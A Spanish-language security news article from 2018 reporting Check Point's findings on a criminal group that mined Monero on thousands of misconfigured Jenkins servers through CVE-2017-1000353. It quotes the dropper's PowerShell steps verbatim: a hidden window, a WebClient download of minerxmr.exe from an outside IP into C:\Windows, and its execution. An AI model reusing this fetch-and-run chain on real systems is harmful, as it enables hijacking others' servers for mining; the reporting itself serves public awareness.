Más de 2,7 millones de euros en criptomonedas desde instalaciones de Jenkins comprometidas

20 de febrero de 2018 Gustavo Genez

El equipo de CheckPoint ha descubierto la que puede ser la mayor operación de minado de criptomonedas: el equivalente a más de 3 millones de dólares de la criptomoneda Monero (XMR) han sido generados utilizando la capacidad de procesado de miles de servidores Jenkins mal configurados.

Jenkins es un popular software de integración continua (CI) de código abierto escrito en Java. Actualmente es mantenido por la comunidad y por el proveedor de servicios de CD/CI CloudBees.

El grupo criminal, de origen chino, se ha valido de instalaciones mal configuradas o inseguras para instalar el troyano encargado de minar la criptomoneda.

Para inyectar el código malicioso, los atacantes aprovechan la vulnerabilidad etiquetada con CVE-2017-1000353 que permitirá saltar restricciones de seguridad y ejecutar comandos en la interfaz CLI de Jenkins:

Primero se comprueban las capacidades y permisos del cliente víctima.
En función de la respuesta anterior, se inyecta el payload que contiene entre otras cosas el código encargado del minado de la criptomoneda.

Inyección del código malicioso. Fuente: https://research.checkpoint.com

Esta segunda fase del ataque es la más interesante:

Primero se ejecuta una instancia de PowerShell en segundo plano: powershell.exe -WindowStyle Hidden:
Se declara un objeto de tipo web-client: $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT
El dropper descarga el software encargado del minado: $P.DownloadFile(‘http://222.184.79.11:5329/minerxmr.exe’, ‘C:\Windows\minerxmr.exe’)
Para posteriormente ejecutarlo con el comando: START C:\Windows\minerxmr.exe

Los atacantes están bien organizados y distribuyen las operaciones de minado entre diferentes ‘pools’. Sin embargo, todas las ganancias están centralizadas en una única cartera, que al momento de escribir la noticia, supera ya los 10829 XMR. El equivalente a unos 2,75 millones de euros al cambio.